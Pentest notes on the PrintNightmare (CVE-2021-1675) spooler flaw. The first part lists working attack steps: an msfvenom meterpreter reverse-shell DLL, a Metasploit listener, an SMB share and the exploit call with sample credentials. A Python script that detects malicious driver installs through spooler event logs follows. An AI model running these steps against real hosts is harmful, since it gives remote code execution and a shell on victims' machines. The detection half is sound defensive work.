PrintNightmare (CVE-2021-1675)

tooling

how to test for

  • rpcdump.py
  • add smbserver locally
  • create malicious dll
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f dll > shell.dll
  • msfconsole
    • use multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LPORT 5555
    • set LHOST
    • run
  • smbserver.py share pwd -smb2-support
  • ./CVE-2021-1675 marvel.local/fcastle:[email protected] '\\share\shell.dll'
  • as before, Defender needs to be turned off on the target first
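The defender-side counterpart to the steps above, added here as an example and not part of the original notes: the driver add in this technique is recorded by the spooler in the Microsoft-Windows-PrintService/Operational log (Event ID 316, "Printer driver ... was added or updated. Files:- ..."), and a payload DLL that fails to load shows up as Event ID 808 ("The print spooler failed to load a plug-in module ..."). That log is disabled by default and has to be enabled before any of this is visible. The `event_id|message` line layout, the allow-list of driver support files, and the sample events are all constructed for the example; real exports from `wevtutil` or `Get-WinEvent` carry more fields.

```python
"""Flag suspicious print-driver installs in PrintService/Operational events.

Input layout 'event_id|message' is an assumption made for this example; the
message texts are modelled on Event ID 316 (driver added/updated) and 808
(plug-in module failed to load). Sample events below are constructed.
"""
import re
from dataclasses import dataclass

# Support files that commonly appear in legitimate 316 events.
# Constructed allow-list; tune it to the drivers actually deployed.
KNOWN_DRIVER_FILES = {
    "unidrv.dll", "unires.dll", "stdnames.gpd",
    "kernelbase.dll", "pscript5.dll", "ps5ui.dll",
}

# The spooler stages newly received driver files under ...\spool\drivers\<arch>\3\New\
# (and keeps replaced ones under ...\3\Old\); a load failure from there right
# after a driver add, or from a UNC path, is the trace a defender wants to catch.
STAGING_PATH = re.compile(r"spool\\drivers\\[^\\]+\\3\\(new|old)\\", re.IGNORECASE)
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")

FILES_RE = re.compile(r"Files:-\s*(?P<files>.*?)\.\s*No user action", re.IGNORECASE | re.DOTALL)
MODULE_RE = re.compile(r"failed to load a plug-in module\s+(?P<path>\S+?),", re.IGNORECASE)


@dataclass
class Finding:
    event_id: int
    reason: str
    detail: str


def parse_event(line):
    """Split 'event_id|message' into (int, str); None for malformed lines."""
    event_id, sep, message = line.partition("|")
    if not sep or not event_id.strip().isdigit():
        return None
    return int(event_id), message.strip()


def inspect_event(event_id, message):
    """Return the findings for one event; non-print events yield none."""
    findings = []
    if event_id == 316:
        m = FILES_RE.search(message)
        if m:
            files = [f.strip() for f in m.group("files").split(",") if f.strip()]
            unknown = [f for f in files if f.lower() not in KNOWN_DRIVER_FILES]
            if unknown:
                findings.append(Finding(316, "driver added with unrecognised files", ", ".join(unknown)))
    elif event_id == 808:
        m = MODULE_RE.search(message)
        if m:
            path = m.group("path")
            if STAGING_PATH.search(path) or UNC_PATH.match(path):
                findings.append(Finding(808, "plug-in load failure from driver staging or UNC path", path))
    return findings


def scan(lines):
    """Run inspect_event over every well-formed line and collect the findings."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is not None:
            findings.extend(inspect_event(*parsed))
    return findings


# Constructed sample events: one benign driver add, one add carrying an
# unknown DLL, one load failure from the staging directory, one benign failure.
SAMPLE_EVENTS = [
    "316|Printer driver Generic / Text Only for Windows x64 Version-3 was added or updated. "
    "Files:- UNIDRV.DLL, UNIRES.DLL, STDNAMES.GPD. No user action is required.",
    "316|Printer driver 1234 for Windows x64 Version-3 was added or updated. "
    "Files:- UNIDRV.DLL, kernelbase.dll, shell.dll. No user action is required.",
    "808|The print spooler failed to load a plug-in module "
    "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\New\\shell.dll, error code 0x45A.",
    "808|The print spooler failed to load a plug-in module "
    "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\PrintConfig.dll, error code 0x7E.",
    "307|Document 7, Print Document owned by alice was printed on Lobby Printer.",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.reason}: {f.detail}")
```

The allow-list approach is deliberately noisy on first run: every legitimate vendor driver in the estate will trip it once, and the right response is to extend `KNOWN_DRIVER_FILES` from those hits rather than to loosen the 808 path check, which is the higher-fidelity signal. Where the spooler is not needed at all (most servers, all domain controllers), stopping and disabling the service removes the attack surface entirely and makes this detection moot.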